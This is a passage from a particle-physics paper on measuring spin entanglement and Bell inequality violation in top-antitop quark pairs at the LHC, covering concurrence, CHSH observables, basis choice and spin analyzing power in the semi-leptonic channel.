}^{8}+C_{33}&B_{1}^{8}+C_{31}+i(B_{2}^{8}+C_{23})&B_{1}^{4}+C_{13}-i(B_{2}^{4} +C_{23})&C_{11}+C_{22}+i(C_{12}-C_{21})\\ B_{1}^{8}+C_{31}-i(B_{2}^{8}+C_{32})&1+B_{4}^{8}-B_{3}^{8}-C_{33}&C_{11}-C_{22}- i(C_{12}+C_{21})&B_{1}^{4}-C_{13}-i(B_{2}^{4}-C_{23})\\ B_{1}^{4}+C_{13}+i(B_{2}^{4}+C_{23})&C_{11}-C_{22}+i(C_{12}+C_{21})&1-B_{4}^{4}+ B_{3}^{8}-C_{33}&B_{1}^{8}-C_{31}+i(B_{2}^{8}-C_{32})\\ C_{11}+C_{22}-i(C_{12}-C_{21})&B_{1}^{4}-C_{13}+i(B_{2}^{4}-C_{23})&B_{1}^{8}-C_ {31}-i(B_{2}^{8}-C_{32})&1-B_{3}^{4}-B_{3}^{8}+C_{33}\end{array}\right). \tag{8}\] One example of a sufficient condition for entanglement can be derived from deleting the \(2^{nd}\) and \(3^{rd}\) rows and columns of this matrix [4], leading to \[|C_{11}+C_{22}|>1+C_{33}. \tag{9}\] Whether \((C_{11}+C_{22})\) is positive or negative leads to two separate cases of \(C_{11}+C_{22}>1+C_{33}\) and \(-C_{11}-C_{22}>1+C_{33}\). Rearranging these inequalities we write \(O_{E}^{\pm}=\pm C_{11}\pm C_{22}-C_{33}-1\) where \(O_{E}^{\pm}>0\) indicates entanglement. It will be shown in Sec. 3.1 that the quantity \(O_{E}^{\pm}\) corresponds to an observable \({\cal O}_{E}^{\pm}\) such that testing entanglement at a collider becomes \[{\cal O}_{E}^{\pm}=\pm C_{11}\pm C_{22}-C_{33}-1,\qquad\text{and}\qquad\langle{ \cal O}_{E}^{\pm}\rangle>0\quad\text{for entanglement}. \tag{10}\] In pre-defined regions, the observable \({\cal O}_{E}^{\pm}\) corresponds to whether the quantum state \(\rho\) is entangled or separable. It is also customary to introduce a quantity called the "concurrence" \({\cal C}\)[38], which is defined for bipartite qubit systems as \[{\cal C}(\rho)=\max(0,\lambda_{1}-\lambda_{2}-\lambda_{3}-\lambda_{4}), \tag{11}\] where \(\lambda_{i}\) (\(i=1,2,3,4\)) are the eigenvalues, sorted by decreasing magnitude, of the matrix \[R_{\rho}=\sqrt{\sqrt{\rho}\tilde{\rho}\sqrt{\rho}},\qquad\quad\tilde{\rho}=( \sigma_{2}\otimes\sigma_{2})\rho^{*}(\sigma_{2}\otimes\sigma_{2}). \tag{12}\] For a separable state \(\rho_{\rm sep}\), the concurrence is \({\cal C}(\rho_{\rm sep})=0\), while for an entangled state \(\rho_{\rm ent}\) the concurrence is \(0<{\cal C}(\rho_{\rm ent})\leq 1\).2 Footnote 2: For intuition, consider the simplified case when \(\rho\) is a pure state. The concurrence \({\cal C}\) can be written as \(\text{tr}(\rho_{A}^{2})=1-{\cal C}^{2}/2\) where \(\rho_{A}\) is the reduced density matrix obtained by taking the partial trace with respect to sub-system \({\cal B}\) of \(\rho\). The concurrence then measures how far the reduced density matrix is from a pure state. Generalizing this to mixed states leads to Eq. (11). Therefore one method of identifying entanglement is to first fully determine \(\rho\), and then compute \({\cal C}(\rho)\) to be zero or not. It can be shown that in the \(t\bar{t}\) system Eq. (10) is equal to the concurrence. ### Bell Inequality Violation By construction, a Bell inequality holds for any system that can be described by a local hidden variable theory [1]. Bell inequality violation indicates that a given theory must be either classically non-local, or quantum-mechanically entangled. This historically was very strong evidence for quantum mechanics. A separable state always satisfies Bell's inequality, while an entangled quantum state may or may not violate a Bell inequality. Therefore, Bell inequality violation is a stricter test of "quantumness" than entanglement. For a bipartite system of two qubits, the only Bell inequality is the CHSH inequality (Clauser-Horne-Shimony-Holt) [39], which reads \[\langle A_{1}B_{1}\rangle-\langle A_{1}B_{2}\rangle+\langle A_{2}B_{1}\rangle +\langle A_{2}B_{2}\rangle\leq 2. \tag{13}\] The first term is a simultaneous measurement \(A_{1}\) on sub-system \({\cal A}\) and \(B_{1}\) on sub-system \({\cal B}\). The other terms are measured in a likewise manner. A quantum state of a bipartite system that violates Eq. (13) exhibits Bell inequality violation (or is Bell non-local). For the case where the two qubits are spins, \(A_{1}\) and \(A_{2}\) can indicate the quantization axes along which the spin of qubit \(\mathcal{A}\) is measured while \(B_{1}\) and \(B_{2}\) can indicate the axes along which the spin of qubit \(\mathcal{B}\) is measured. For instance the choice of \[A_{1}=\sigma_{3},\qquad A_{2}=\sigma_{1},\qquad B_{1}=-\frac{1}{\sqrt{2}}( \sigma_{1}+\sigma_{3}),\qquad B_{2}=\frac{1}{\sqrt{2}}(\sigma_{1}-\sigma_{3}), \tag{14}\] when applied to the Bell state \(\psi_{\rm Bell}=(|01\rangle-|10\rangle)/\sqrt{2}\) violates the CHSH inequality. Given a quantum state, it is crucial to choose the optimal axes in order to determine if a quantum state violates the CHSH inequality, via Eq. (13). It has been shown that while using the optimal axes, the left-hand side of Eq. (13) becomes \(2\sqrt{\lambda_{1}+\lambda_{2}}\), where \(\lambda_{1}\) and \(\lambda_{2}\) are the two largest eigenvalues of \(C^{T}C\)[40]. In a collider environment, however, this method can lead to a biased estimation [5; 6]. For simplicity we will choose the fixed axes [8] \[A_{1}=\sigma_{3},\qquad A_{2}=\sigma_{1},\qquad B_{1}=\pm\frac{1}{\sqrt{2}}( \sigma_{3}+\sigma_{1}),\qquad B_{2}=\pm\frac{1}{\sqrt{2}}(-\sigma_{3}+\sigma_{ 1}). \tag{15}\] For this choice the CHSH inequality becomes \[|C_{33}\pm C_{11}|<\sqrt{2}. \tag{16}\] In a similar way to entanglement, we can cast this into an observable as \[\mathcal{O}_{B}^{\pm}=\pm(C_{33}+C_{11})-\sqrt{2},\qquad\text{and}\qquad \langle\mathcal{O}_{B}^{\pm}\rangle>0\quad\text{for Bell inequality violation}. \tag{17}\] Whether the \(+\) or \(-\) is used depends on the predicted value of \(C_{33}+C_{11}\). Finally, we make a comment about the generality of the Bell inequality violation test that can be performed at a collider. In the 1990's, it was suggested that Bell inequality violation could be observed at \(e^{+}e^{-}\) colliders in the \(\tau^{+}\tau^{-}\) final state [33; 34; 35]. The conclusion of Ref. [35] was that Bell inequality violation was not observable at a collider because quantities measured at colliders are commuting while non-commuting quantities are required to violate a Bell inequality. In this work, we do not perform a fully general test of Bell's inequality. Instead, we first identify a quantum state, and then ask whether it is a quantum state that does or does not violate Bell's inequality. The non-commutation arises from our assumption that we are working with a quantum state and thus gain access to spins. ## 3 The Top-Antitop System at Hadron Colliders In this section, we cover the details that are necessary to identify the \(t\bar{t}\) final state at the LHC as a quantum state. ### Two-Body Production at Hadron Colliders Consider the two-to-two scattering process \({\cal X}{\cal Y}\to{\cal AB}\). The rate for this process is given by the cross section \(\sigma({\cal X}{\cal Y}\to{\cal AB})\) and is calculated by taking the matrix element \({\cal M}({\cal X}{\cal Y}\to{\cal AB})\), squaring it, and integrating it over phase space \({\rm d}\Pi\). The initial state spins (and other quantum numbers) are averaged, and when the final state spins are not measured they are summed. Schematically \[\sigma({\cal X}{\cal Y}\to{\cal AB})=\int{\rm d}\Pi\ \overline{\sum_{\rm initial }}\ \sum_{ab,\bar{a}\bar{b}}{\cal M}({\cal X}{\cal Y}\to{\cal AB})_{a\bar{a}}{\cal M }^{*}({\cal X}{\cal Y}\to{\cal AB})_{b\bar{b}}, \tag{10}\] where \(ab\) is the spin index of particle \({\cal A}\), \(\bar{a}\bar{b}\) is the spin index of particle \({\cal B}\), and \(\overline{\sum}\) indicates averaging. The _production spin density matrix_ is \[R_{ab,\bar{a}\bar{b}}=\overline{\sum_{\rm initial}}{\cal M}({\cal X}{\cal Y} \to{\cal AB})_{a\bar{a}}{\cal M}^{*}({\cal X}{\cal Y}\to{\cal AB})_{b\bar{b}}, \tag{11}\] such that \[\sigma({\cal X}{\cal Y}\to{\cal AB})=\int{\rm d}\Pi\sum_{ab,\bar{a}\bar{b}}R_ {ab,\bar{a}\bar{b}}. \tag{12}\] Taking the trace of \(R_{ab,\bar{a}\bar{b}}\) and performing the phase space integral gives the cross section, while the full matrix provides differential spin information. When particles \({\cal A}\) and \({\cal B}\) are both spin-1/2, the matrix \(R_{ab,\bar{a}\bar{b}}\) is a \(4\times 4\) matrix and can be decomposed into the Pauli basis according to Eq. (3).3 Footnote 3: The normalization for a production spin density matrix \(R\) is \({\rm tr}(R)=d\sigma/d\Pi\) while the normalization for a quantum state \(\rho\) is \({\rm tr}(\rho)=1\). If particle \({\cal A}\) decays, the _decay spin density matrix_ carries the differential spin information of particle \({\cal A}\). Consider the three-body decay of \({\cal A}\to a_{1}a_{2}a_{3}\) \[\Gamma^{\cal A}_{ab}={\cal M}({\cal A}\to a_{1}a_{2}a_{3})_{a}{\cal M}^{*}({ \cal A}\to a_{1}a_{2}a_{3})_{b}, \tag{13}\] where again \(ab\) is the spin index of particle \({\cal A}\). In the narrow width approximation the production and decay can be described together \[\sigma({\cal X}{\cal Y}\to{\cal AB}\to(a_{1}a_{2}a_{3})(b_{1}b_{2}b_{3}))=\int {\rm d}\Pi\ \sum_{ab,\bar{a}\bar{b}}(\Gamma^{\cal A}_{ab}\ R_{ab,\bar{a}\bar{b}}\ \Gamma^{\cal B}_{\bar{a}\bar{b}}). \tag{14}\] The final state phase space can be partially integrated over to find \[\begin{split}\int{\rm d}\Pi\ \sum_{ab,\bar{a}\bar{b}}(\Gamma^{ \cal A}_{ab}\ R_{ab,\bar{a}\bar{b}}\ \Gamma^{\cal B}_{\bar{a}\bar{b}})&=\int{\rm d}\Omega^{\cal A}{ \rm d}\Pi^{\cal A}{\rm d}\Omega^{\cal B}{\rm d}\Pi^{\cal B}\ \sum_{ab,\bar{a}\bar{b}}(\Gamma^{ \cal A}_{ab}\ R_{ab,\bar{a}\bar{b}}\ \Gamma^{\cal B}_{\bar{a}\bar{b}}),\\ &=\int{\rm d}\Omega^{\cal A}{\rm d}\Omega^{\cal B}\ \sum_{ab,\bar{a}\bar{b}}(\tilde{\Gamma}^{\cal A}_{ab}\ R_{ab,\bar{a}\bar{b}}\ \tilde{\Gamma}^{\cal B}_{\bar{a}\bar{b}}).\end{split} \tag{15}\] The total phase space \(\mathrm{d}\Pi\) is divided into the angular phase space of one of the decay products of particle \(\mathcal{A}\): \(\mathrm{d}\Omega^{\mathcal{A}}\), the angular phase space of one of the decay products of particle \(\mathcal{B}\): \(\mathrm{d}\Omega^{\mathcal{B}}\), the remaining phase space of the decay products of particle \(\mathcal{A}\): \(\mathrm{d}\Pi^{\mathcal{A}}\), and remaining phase space of the decay products of particle \(\mathcal{B}\): \(\mathrm{d}\Pi^{\mathcal{B}}\). The angular space is two-dimensional \((\theta,\phi)\) but we write it as a three-vector \(\Omega_{i}=(\cos\phi\sin\theta,\sin\phi\sin\theta,\cos\theta)\) to represent the direction of the decay product of interest. Here, \(\theta\) is the polar angle and \(\phi\) is the azimuthal angle with respect to a reference direction. While \(\Gamma^{\mathcal{A}}_{ab}\) is the decay spin density matrix for particle \(\mathcal{A}\), \(\tilde{\Gamma}^{\mathcal{A}}_{ab}\) is the partially integrated decay width that leaves the angular space of one of the decay products unintegrated. It can be decomposed as in Eq. (2) to \(\tilde{\Gamma}^{\mathcal{A}}_{ab}\propto\delta_{ab}+\sum_{i}B^{\mathcal{A}}_{ i}\sigma_{i,ab}\) where \(B^{\mathcal{A}}_{i}\) is the net polarization of particle \(\mathcal{A}\). Performing the calculation of \(\tilde{\Gamma}^{\mathcal{A}}_{ab}\) in the rest frame of particle \(\mathcal{A}\) leads to \[\tilde{\Gamma}^{\mathcal{A}}_{ab}(\Omega_{i})=\frac{1}{2}\Gamma^{A}\Big{(} \delta_{ab}+\sum_{i}B^{\mathcal{A}}(\kappa\Omega_{i})\sigma_{i,ab}\Big{)}, \tag{10}\] where \(\Gamma^{\mathcal{A}}\) is proportional to the decay width of \(\mathcal{A}\to a_{1}a_{2}a_{3}\), \(B^{\mathcal{A}}\) is the magnitude of the polarization of particle \(\mathcal{A}\), and \(\kappa\) is called the _spin analyzing power_ and is associated with the decay particle that has been left unintegrated. The value of \(\kappa\) is between \(-1\) and \(1\) and describes how correlated a decay product is with the spin of the mother particle. Writing the decay spin density matrix according to Eq. (10), decomposing the production spin density matrix according to Eq. (3), and summing over \(ab,\bar{a}\bar{b}\) in Eq. (11), the differential cross section can be written as \[\frac{1}{\sigma}\frac{\mathrm{d}^{4}\sigma}{\mathrm{d}^{2}\Omega^{\mathcal{A}} \mathrm{d}^{2}\Omega^{\mathcal{B}}}=\frac{1}{(4\pi)^{2}}\bigg{(}1+\sum_{i} \big{(}\kappa^{\mathcal{A}}\,B^{\mathcal{A}}_{i}\Omega^{\mathcal{A}}_{i}+ \kappa^{\mathcal{B}}\,B^{\mathcal{B}}_{i}\Omega^{\mathcal{B}}_{i}\big{)}+ \sum_{i,j}\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}\,\Omega^{\mathcal{A}}_{i}C _{ij}\Omega^{\mathcal{B}}_{j}\bigg{)}, \tag{11}\] where the angle \(\Omega^{\mathcal{A}}_{i}\) (\(\Omega^{\mathcal{B}}_{j}\)) is evaluated in the rest frame of particle \(\mathcal{A}\) (\(\mathcal{B}\)) relative to the \(i^{\mathrm{th}}\) (\(j^{\mathrm{th}}\)) axis of a chosen basis. To extract individual parameters, one can select which angular integrals to perform. For example, to extract a component of the spin correlation matrix \(C_{ij}\), one integrates over \(\phi^{\mathcal{A}}\) and \(\phi^{\mathcal{B}}\) to obtain \[\frac{1}{\sigma}\frac{\mathrm{d}\sigma}{\mathrm{d}\cos\theta^{\mathcal{A}}_{i} \,\mathrm{d}\cos\theta^{\mathcal{B}}_{j}}=-\frac{1}{4}\left(1+\kappa^{ \mathcal{A}}B^{\mathcal{A}}_{i}\cos\theta^{\mathcal{A}}_{i}+\kappa^{\mathcal{B }}B^{\mathcal{B}}_{j}\cos\theta^{\mathcal{B}}_{j}+\kappa^{\mathcal{A}}\kappa^ {\mathcal{B}}C_{ij}\cos\theta^{\mathcal{A}}_{i}\cos\theta^{\mathcal{B}}_{j} \right), \tag{12}\] where \(\theta^{\mathcal{A}}_{i}\) (\(\theta^{\mathcal{B}}_{j}\)) is the angle between the momentum of the decay product of particle \(\mathcal{A}\) (\(\mathcal{B}\)) and the \(i^{\mathrm{th}}\) (\(j^{\mathrm{th}}\)) axis, in the rest frame of particle \(\mathcal{A}\) (\(\mathcal{B}\)). This distribution can be transformed to \[\frac{1}{\sigma}\frac{\mathrm{d}\sigma}{\mathrm{d}(\cos\theta^{\mathcal{A}}_{i} \cos\theta^{\mathcal{B}}_{j})}=-\frac{1}{2}\left(1+\kappa^{\mathcal{A}}\kappa^ {\mathcal{B}}C_{ij}\cos\theta^{\mathcal{A}}_{i}\cos\theta^{\mathcal{B}}_{j} \right)\log\big{|}\cos\theta^{\mathcal{A}}_{i}\cos\theta^{\mathcal{B}}_{j} \big{|}, \tag{13}\] Thus measuring angles of decay products measures parameters of the production spin density matrix. We mention three ways to extract the value of \(C_{ij}\) from data using Eq. (3.10). The first way is to simply perform a fit to the differential cross section. The second way is to compute the asymmetry of the distribution. The asymmetry \(A\) for a variable \(x\) is \[A_{x}=\frac{N_{x}^{+}-N_{x}^{-}}{N_{x}^{+}+N_{x}^{-}}, \tag{3.11}\] where \(N_{x}^{+}\) (\(N_{x}^{-}\)) is the number of events with \(x>0\) (\(x<0\)): \[N_{x}^{+}=\int_{0}^{x_{\rm max}}\frac{1}{\sigma}\frac{\mathrm{d}\sigma}{ \mathrm{d}x}\mathrm{d}x,\qquad\quad N_{x}^{-}=\int_{x_{\rm min}}^{0}\frac{1}{ \sigma}\frac{\mathrm{d}\sigma}{\mathrm{d}x}\mathrm{d}x. \tag{3.12}\] When the asymmetry variable is \(x=\cos\theta_{i}^{\mathcal{A}}\cos\theta_{j}^{\mathcal{B}}\) then \(x_{\rm max}=1\) and \(x_{\rm min}=-1\). This method works because \(C_{ij}\) multiplies the component of the differential cross section that is an odd function with respect to \(\cos\theta_{i}^{\mathcal{A}}\cos\theta_{j}^{\mathcal{B}}\). Each spin correlation matrix entry \(C_{ij}\) is then \[C_{ij}=\frac{4}{\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}}\left(A_{\cos\theta_ {i}^{\mathcal{A}}\cos\theta_{j}^{\mathcal{B}}}\right). \tag{3.13}\] The third way to extract \(C_{ij}\) is to compute the mean of the distribution in Eq. (3.10) since \(\langle\cos\theta_{i}^{A}\cos\theta_{j}^{B}\rangle\ \propto\ C_{ij}\), where the constant of proportionality depends on the distribution. The variance of the mean is smaller than the variance of the asymmetry, however, the asymmetry is more robust to systematic uncertainties. In our study we utilize the asymmetry. ### The \(t\bar{t}\) System as a Quantum State Consider the \(t\bar{t}\) final state as a bipartite qubit system with the spin of the top and anti-top identified as each qubit. Then each event at the LHC is a single measurement of this quantum state. Each event can also be called a quantum sub-state. Let the quantum state that describes the \(t\bar{t}\) system be \(\rho\). The kinematics of the \(t\bar{t}\) system are characterized by the invariant mass, \(m_{t\bar{t}}\), of the top-anti-top pair and by the angle, \(\theta\), of the top momentum (in the \(t\bar{t}\) center-of-mass frame) relative to the beam. The quantum state for a single point in this phase space is \(\rho(m_{t\bar{t}},\theta)\), while more generally, integrating over a region \(\Pi\) leads to the quantum state \(\rho_{\Pi}\)[4]. At a hadron collider, the two partonic processes, at leading order, that produce \(t\bar{t}\) are \(q\bar{q}\) and \(gg\). This means that \(\rho\) is necessarily a mixed state where the coefficients, as in Eq. (2.1), are given by the relative parton luminosities [4]. Additionally, we can identify the production spin density matrix, Eq. (3.2), as a quantum density matrix for a sub-state (for a given initial partonic state) when normalized correctly and evaluated in a fixed basis [4]. The ideal final state would be the exclusive production of \(t\bar{t}\) since additional radiation can disrupt the spin correlations between the \(t\) and \(\bar{t}\). In this study, we work at leading order and leave higher order effects to future work. In the context of spin correlations, higher order effects have been studied and are known to modify spin correlations at the \(10-30\%\) level [41]. The main backgrounds for \(t\bar{t}\) in the semi-leptonic channel are single top, \(W+\) jets, multijet, \(t\bar{t}W\), \(t\bar{t}Z\), and \(t\bar{t}h\). Altogether the background has a cross section that is \(\approx 10\%\) of the size of the signal when two \(b\)-tags are required [42; 43]. In the boosted region this reduces to \(\approx 4\%\)[44; 45]. In this work the impact of backgrounds is neglected and left to future work. In Bell inequality tests, loopholes often exist and the \(t\bar{t}\) system is no exception. In some events, the top and anti-top decay while inside of each other's light cones. This is an example of the locality loophole. As the invariant mass \(m_{t\bar{t}}\) of the \(t\bar{t}\) system increases, the fraction of events which are space-like separated when decaying approaches 100% and is already at 90% for \(m_{t\bar{t}}>800\) GeV [6]. Another loophole is the fair sampling loophole which asserts that if the detection efficiency is low then a violation of Bell's inequality could be faked. The fair sampling loophole, as well as others, are expected to be difficult to address at colliders. #### Spin Correlations The \(t\bar{t}\) system has been studied for many years. In 1988 it was known that when produced via the strong force (\(gg\) and \(q\bar{q}\)), neither the tops nor anti-tops are polarized at leading order, but that spin correlations exist between the top and anti-top [10]. Furthermore, these spin correlations can be observed by the angular separations between the top and anti-top decay products [11; 12]. The \(gg\) and \(q\bar{q}\) initial states give rise to different spin correlation behavior which is also the reason that the LHC and the Tevatron are very complementary probes of this system. The heuristic intuition for the spin correlations is that near threshold the spins of the top and anti-top are aligned along the beamline direction. The possible outgoing spin configurations are controlled by the incoming spins. For the \(q\bar{q}\) initial state the \(q\) and \(\bar{q}\) have opposite helicity with the spins aligned along the beam axis. Near threshold the top and anti-top have mostly opposite helicity with spins aligned along the beam axis, leading to a configuration with a spin-triplet contribution. At high \(p_{T}\), the top and anti-top are still opposite in helicity but their spin axes become aligned with their direction of motion. In between the threshold region and the high \(p_{T}\) region, the spin axes of the top and anti-top interpolate between these directions [13; 14]. The basis for choosing the spin axes is called the off-diagonal basis and has been shown to optimize the spin correlations from \(q\bar{q}\) production. The situation is different for \(gg\) production. Incoming pairs of gluons can have the same helicity or the opposite helicity. Near threshold same-helicity gluons dominate and the outgoing top and anti-top have the same helicity with the spin axes aligned along the beam axis, leading to a configuration with a spin-singlet contribution, in contrast to the \(q\bar{q}\) case. At high \(p_{T}\), the opposite-helicity gluons dominate and the outgoing top and anti-top have opposite helicity with the spin axes becoming aligned along their direction of motion, leading to a spin-triplet configuration, which is the same as the \(q\bar{q}\) case. The optimal choice of spin axes for optimizing spin correlations is aligned along the direction of the top and anti-top [14; 15; 46]. #### Basis Choice When calculating spin correlations, it is necessary to choose a basis along which to measure the spins. One common choice is the fixed beam basis which starts from the center-of-mass frame of the \(t\bar{t}\) system and uses \(\{\hat{x},\hat{y},\hat{z}\}\) where \(\hat{z}\) points along the beam and \(\hat{x}\) and \(\hat{y}\) are fixed in the plane transverse to the beam. Another common choice is the helicity basis which starts from the center-of-mass frame and defines \(\{\hat{r},\hat{k},\hat{n}\}\) where \(\hat{k}\) points along the top quark three-momentum. Then \[\hat{r} =\frac{1}{\sin\theta}(\hat{z}-\cos\theta\hat{k}), \tag{3.14a}\] \[\hat{n} =\hat{r}\times\hat{k}, \tag{3.14b}\] where \(\hat{r}\) is the component of the beam direction that is orthogonal to \(\hat{k}\), \(\hat{n}\) is the remaining orthogonal direction, and \(\cos\theta=\hat{k}\cdot\hat{z}\). Figure 1 illustrates these two bases.4 Footnote 4: We calculate angles for both the top and anti-top using the axes \(\{\hat{r},\hat{k},\hat{n}\}\) where \(\hat{k}\) is defined by the top quark. Sometimes in other studies the angles for decay products from the anti-top are defined relative to a second set of axes defined by the anti-top. At the LHC, at threshold the fixed beam basis has the largest spin correlations while in the high-\(p_{T}\) regime, the helicity basis has the largest correlations [47]. At high-\(p_{T}\) the helicity basis is nearly optimal for entanglement and Bell inequality violation too [48]. One very important note is that constructing the total \(t\bar{t}\) quantum state (_i.e._ quantum tomography) requires a fixed basis for all of the events [4, 7, 48]. In a fixed basis, the axes are the same for each event which means that each event is a single measurement of a parameter of Eq. (2.3). Using many events then increases the accuracy of the measurement of the \(t\bar{t}\) quantum state. Figure 1: Illustration of the fixed beam basis \(\{\hat{x},\hat{y},\hat{z}\}\) and the helicity basis \(\{\hat{r},\hat{k},\hat{n}\}\). The incoming beams are blue and the outgoing top and anti-top are orange. \(\theta\) is the polar angle between the \(\hat{z}\)-axis (the beam direction) and the \(\hat{k}\)-axis (the top quark momentum direction). The helicity basis, by contrast, is not a fixed basis because the axes change event-by-event. Performing the summation over many events does not measure a parameter of Eq. (3) but rather its expectation value [7; 48] since the basis is different event-by-event. Thus in the helicity basis, the summation over events does not produce a quantum state, but is simply a summation over events. In Ref. [7] this sum was labelled a "fictitious state." Showing that a fictitious state is entangled does not show that the associated \(t\bar{t}\) quantum state is entangled, but it does show that there exists a sub-state (both of the fictitious state and of the associated quantum state) that is entangled. This follows from the fact that both the quantum state and fictitious states are convex sums and the positivity of concurrence. The same considerations apply to Bell inequality violation. Appendix D provides a proof of this statement, as well as more discussion on fictitious states (Ref. [48] provides additional details). In our study we use the helicity basis for both concurrence and CHSH violation which means our results indicate the presence of entanglement and of Bell inequality violation, but not the strength. In the high-\(p_{T}\) region, these are naively not detectable using the fixed beam basis. ### Spin Analyzing Power As seen in Eq. (3.10) the measured value of spin correlations is impacted linearly by the spin analyzing power \(\kappa^{\mathcal{A}}\) from the decay of particle \(\mathcal{A}\) and the spin analyzing power \(\kappa^{\mathcal{B}}\) from the decay of particle \(\mathcal{B}\). To maximize the sensitivity and significance, the daughter particle with the largest spin analyzing power should be used. When the top decays leptonically, the anti-lepton (\(\ell^{+}\)) has \(\kappa=1.00\) which is maximally correlated with the spin of the top quark. In the fully leptonic channel of the \(t\bar{t}\) system the lepton and the anti-lepton are used which results in maximal correlation. In the semi-leptonic channel, that we study here, one side of the \(t\bar{t}\) system decay hadronically. In the hadronic decay of the top, there is a \(b\)-jet and two light flavor jets, one of which is initiated by an up-type quark and one of which is initiated by a down-type quark. If the down-type-initiated jet could be identified, then the maximal correlation of \(\kappa=1.00\) would be maintained because the leading order matrix element for the down quark and lepton in top decays is the same. Unfortunately, this is usually not possible. One can consider charm tagging since charm quarks are present in half of the hadronic top decays. It turns out that the charm tagging rate is not high enough for this to be better than the optimal hadronic method that we use. The required charm tagging rate is calculated in Appendix E.5 In any case, in many studies of top spin correlations the softer of the two jets was used since one expects that down-type-initiated jet is more often the softer one. This yields a spin analyzing power of \(\kappa=0.50\). Using the \(b\)-jet is not ideal because its spin analyzing power is \(\kappa=0.40\). Footnote 5: Another possibility would be incorporating measurements of jet charge, however, this seems challenging [49; 50]. The optimal spin analyzing power, assuming that one cannot distinguish the up-type-initiated and down-type-initiated jets, was calculated in Ref. [51]. They find an integrated value of \(\kappa_{\rm opt}=0.64\) when one uses a weighted sum of the two jets whose four-vectors are labelled as \(\vec{p}_{\rm soft}\) and \(\vec{p}_{\rm hard}\). The optimal hadronic value is given by using the four-vector \(\vec{p}_{\rm opt}\) which is \[\vec{p}_{\rm opt}(\cos\theta_{W})=P_{d\to p_{\rm soft}}(\cos\theta_{W})\,\hat{ p}_{\rm soft}+P_{d\to p_{\rm hard}}(\cos\theta_{W})\,\hat{p}_{\rm hard}, \tag{3.15}\] where \(\theta_{W}\) is the angle between the momentum of the \(d\)-quark and the momentum axis of the \(W\) in the rest frame of the \(W\) (see Fig. 2). The function \(P_{d\to p_{\rm soft}}(\cos\theta_{W})\) is the probability that the \(d\) quark is the softer jet and \(P_{d\to p_{\rm hard}}(\cos\theta_{W})\) is the probability that the \(d\) quark is the harder jet. These functions are given in Appendix C. The optimal direction for the hadronic decay of anti-top quark is defined likewise and the resulting spin analyzing power is \(\kappa_{\rm opt}=-0.64\). When extracting the components of the spin correlation matrix via Eq. (3.13) in the semi-leptonic channel one of the spin analyzing powers is given by the lepton and one is given by the optimal hadronic direction. ### Entanglement in \(t\bar{t}\) For a general bipartite quantum state, the 15 values of \(B_{i}^{\cal A}\), \(B_{i}^{\cal B}\), and \(C_{ij}\) need to be specified. In the \(t\bar{t}\) system at leading order, \(B_{i}^{\cal A}=0\) and \(B_{i}^{\cal B}=0\) for all \(i\), and \(C_{ij}=C_{ji}\)[52]. Furthermore, in the helicity basis, where \(1=\hat{r}\), \(2=\hat{k}\), and \(3=\hat{n}\), only \(C_{12}\) is non-zero leading to a set of only 4 parameters: \(C_{11}\), \(C_{22}\), \(C_{33}\), and \(C_{12}\). With only these parameters, a subset of the list of sufficient conditions generated by the PPT criterion can be shown to be a set of necessary conditions [8] \[|C_{11}+C_{22}| >1+C_{33}, \tag{3.16a}\] \[|4C_{12}^{2}+(C_{11}-C_{22})^{2}|^{1/2} >1-C_{33}. \tag{3.16b}\] Figure 2: Illustration of the top decay system in the rest frame of the \(t\) (left) and rest frame of the \(W\) (right). Between the down-type anti-quark and the up-type quark in the \(t\) rest frame, the down-type anti-quark tends to be softer while the up-type quark tends to be harder. Instead of \(\{C_{11},C_{22},C_{33},C_{12}\}\), one can use the three eigenvalues of the \(C\) matrix \(\{C_{1},C_{2},C_{3}\}\). Using these Eq. (3.16) becomes \[|C_{1}+C_{2}| >1+C_{3}, \tag{3.17a}\] \[|C_{1}-C_{2}| >1-C_{3}. \tag{3.17b}\] These conditions can be shown to be directly related to the concurrence \[\mathcal{C}(\rho)=\left\{\begin{array}{ll}\frac{1}{2}{\rm max}(|C_{1}+C_{2}| -1-C_{3},0),&C_{3}\leq 0\\ \frac{1}{2}{\rm max}(|C_{1}-C_{2}|-1+C_{3},0),&C_{3}\geq 0\end{array}\right. \tag{3.18}\] where the necessary and sufficient condition for entanglement becomes the usual \(\mathcal{C}(\rho)>0\). The concurrence for \(t\bar{t}\) is shown in Fig. 3 as a function of phase space position \((\theta,m_{t\bar{t}})\) generated at parton-level at 13 TeV with no phase space cuts applied. There is one region of sizable entanglement near threshold (due to like-helicity gluons producing a spin-singlet state) and a second region at high boost and large \(\theta\) (due to unlike-helicity gluons producing a spin-triplet state). Since we have specified the final state to be \(t\bar{t}\), for a given phase space region we can identify which case of Eq. (3.16a) applies. This can be done either semi-analytically through the spin production matrix in Eq. (3.2) or numerically from Fig. 3. Consider first the entangled region near threshold. Here \(C_{11}<0\), \(C_{22}<0\), and \(C_{33}<0\), therefore by Eq. (3.18) the inequality is \[-C_{11}-C_{22}-C_{33}-1>0. \tag{3.19}\] Figure 3: Concurrence \(\mathcal{C}(\rho)\) of the \(t\bar{t}\) system at parton-level in the \(\theta-m_{t\bar{t}}\) plane at \(\sqrt{s}=13\) TeV with no phase space cuts. Entanglement is indicated by a value \(\mathcal{C}(\rho)>0\). In the boosted region \(C_{11}>0\), \(C_{22}>0\), and \(C_{33}<0\), which leads to the inequality \[C_{11}+C_{22}-C_{33}-1>0. \tag{3.20}\] Converting these into operators, like in Eq. (2.10), we find \[D =\frac{1}{3}(C_{11}+C_{22}+C_{33}), D<-\frac{1}{3}\quad\text{for entanglement}, \tag{3.21}\] \[D_{3} =\frac{1}{3}(-C_{11}-C_{22}+C_{33}), D_{3}<-\frac{1}{3}\quad\text{for entanglement}. \tag{3.22}\] Through Eq. (3.8) both \(D\) and \(D_{3}\) can be related directly to measurements \[\frac{1}{\sigma}\frac{\text{d}\sigma}{\text{d}\cos\theta^{ \mathcal{AB}}} =\frac{1}{2}(1+\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}D\cos\theta^{ \mathcal{AB}}), \tag{3.23}\] \[\frac{1}{\sigma}\frac{\text{d}\sigma}{\text{d}\cos\theta^{ \prime\mathcal{AB}}} =\frac{1}{2}(1+\kappa^{\mathcal{A}}\kappa^{\mathcal{B}}D_{3}\cos \theta^{\prime\mathcal{AB}}), \tag{3.24}\] where the angles are given by \[\cos\theta^{\mathcal{AB}} =\sum_{i}\Omega_{i}^{\mathcal{A}}\Omega_{i}^{\mathcal{B}}, 